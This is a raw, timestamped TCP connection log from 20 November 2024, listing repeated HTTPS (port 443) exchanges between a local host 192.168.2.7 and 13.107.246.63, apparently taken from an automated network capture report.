                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.136898041 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.137053967 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.137088060 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.835607052 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.836235046 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.836287975 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.836719036 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.836735964 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.930674076 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.931279898 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.931318998 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.931643963 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.931648970 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.374608040 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.375381947 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.375442028 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.375830889 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.375838995 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.377486944 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.380603075 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.380686998 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.380724907 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.380743027 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.380753040 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.380759001 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.383636951 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.383660078 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.383735895 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.383869886 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.383882999 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.701163054 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.704204082 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.704288006 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.704310894 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.704329967 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.704392910 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.704426050 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.704441071 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.704449892 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.704454899 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.707912922 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.707982063 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.708072901 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.709029913 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.709062099 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.760139942 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.764390945 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.764405966 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.764847040 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.764852047 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.813478947 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.816790104 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.816832066 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.816876888 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.816926003 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.816998959 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.817019939 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.817034006 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.817040920 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.820482016 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.820555925 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.820660114 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.820887089 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:46.820921898 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.293827057 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.294615030 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.294663906 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.295278072 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.295295954 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.510134935 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.510231018 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.510400057 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.510584116 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.510600090 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.510611057 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.510616064 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.514364958 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.514451027 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.514564991 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.514782906 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.514816046 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.747546911 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.750494957 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.750597954 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.750680923 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.750682116 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.750737906 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.750761986 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.754153013 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.754232883 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.754334927 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.754528046 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:47.754579067 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.307356119 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.308079004 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.308092117 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.308594942 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.308599949 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.599035978 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.599730968 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.599766016 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.600245953 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.600253105 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.713850021 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.714477062 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.714529037 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.714941025 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.714957952 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.899132013 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.899597883 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.899682045 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.899719954 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.899729013 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.899743080 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.899746895 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.903467894 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.903512955 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.903595924 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.903789043 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:48.903803110 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.068283081 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.071551085 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.071631908 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.106175900 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.106215000 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.106242895 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.106260061 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.165105104 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.165280104 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.165344954 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.340732098 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.340769053 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.340805054 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.340825081 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.352524042 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.352546930 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.352698088 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.354059935 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.354073048 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.354734898 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.354762077 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.354811907 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.355051041 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.355062962 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.360214949 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.360717058 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.360765934 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.361980915 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.362014055 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.556130886 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.556732893 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.556797028 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.557229996 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.557244062 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.971980095 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.976324081 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.976387978 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.976424932 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.976463079 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.976524115 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.976547956 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.976571083 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.976584911 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.979779005 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.979800940 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.979880095 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.980020046 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:49.980035067 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.096458912 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.099414110 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.099489927 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.099541903 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.099541903 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.099566936 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.099587917 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.102518082 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.102556944 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.102657080 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.102826118 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.102854013 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.839633942 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.841810942 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.841829062 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.842492104 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:50.842499018 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.098804951 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.105592012 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.105614901 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.106224060 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.106230021 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.171168089 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.171880960 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.171896935 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.172354937 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.172359943 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.292376995 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.295401096 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.295442104 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.295459032 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.295502901 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.295577049 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.295593023 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.295603991 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.295609951 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.299154997 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.299227953 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.299335003 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.299556017 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.299591064 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.556821108 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.560069084 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.560143948 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.580699921 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.580734968 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.580771923 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.580779076 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.665735006 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.669080019 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.669190884 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.669209003 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.669251919 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.689024925 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.689037085 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.689094067 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.689100027 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.765178919 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.765248060 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.765330076 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.769556046 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.769645929 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.769721031 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.769771099 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.769807100 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.770210981 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:51.770247936 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.002304077 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.022243977 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.022253990 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.024843931 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.024848938 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.029251099 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.032464981 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.032526016 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.036391020 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.036406994 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.470434904 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.470515013 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.470616102 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.470988989 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.470999956 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.471013069 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.471018076 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.474706888 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.474724054 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.474812984 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.475049973 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.475061893 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.478230953 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.483222008 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.483298063 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.483355045 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.483390093 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.483447075 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.483488083 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.483488083 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.483515978 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.483541965 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.485970020 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.485999107 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.486062050 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.486198902 CET50037443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:52.486213923 CET4435003713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:53.103936911 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:53.107785940 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:53.107856035 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:53.108292103 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:53.108308077 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:53.554924965 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:53.558028936 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:53.558166027 CET50033443192.168.2.713.107.246.63
